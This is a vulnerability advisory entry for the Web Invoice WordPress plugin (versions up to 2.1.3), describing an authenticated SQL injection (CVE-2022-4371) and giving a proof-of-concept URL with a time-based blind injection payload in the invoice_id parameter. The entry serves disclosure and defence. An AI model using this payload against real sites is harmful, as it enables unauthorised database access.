Lucene search
Daniel KrohmerWPEX-ID:45F43359-98C2-4447-B51B-2D466BAD8261HistoryDec 12, 2022 - 12:00 a.m.
Web Invoice <= 2.1.3 - Authenticated SQLi
2022-12-1200:00:00
Daniel Krohmer
76
web invoice
authenticated
sql injection
user
manage invoice
admin
plugin
settings
url
exploit
EPSS
0.001
Percentile
50.4%
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscriber could exploit this as well
When logged in with a user allowed to Manage invoice (default admin but can be changed via the plugin's settings), open the following URL
https://example.com/wp-admin/admin.php?page=new_web_invoice&invoice_id=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log
Related
prion
prion
Sql injection
2023-01-02 22:15:00
wpvulndb
wpvulndb
Web Invoice <= 2.1.3 - Authenticated SQLi
2022-12-12 00:00:00
cvelist
cvelist
CVE-2022-4371 Web Invoice <= 2.1.3 - Authenticated SQLi
2023-01-02 21:49:06
cve
cve
CVE-2022-4371
2023-01-02 22:15:17
nvd
nvd
CVE-2022-4371
2023-01-02 22:15:17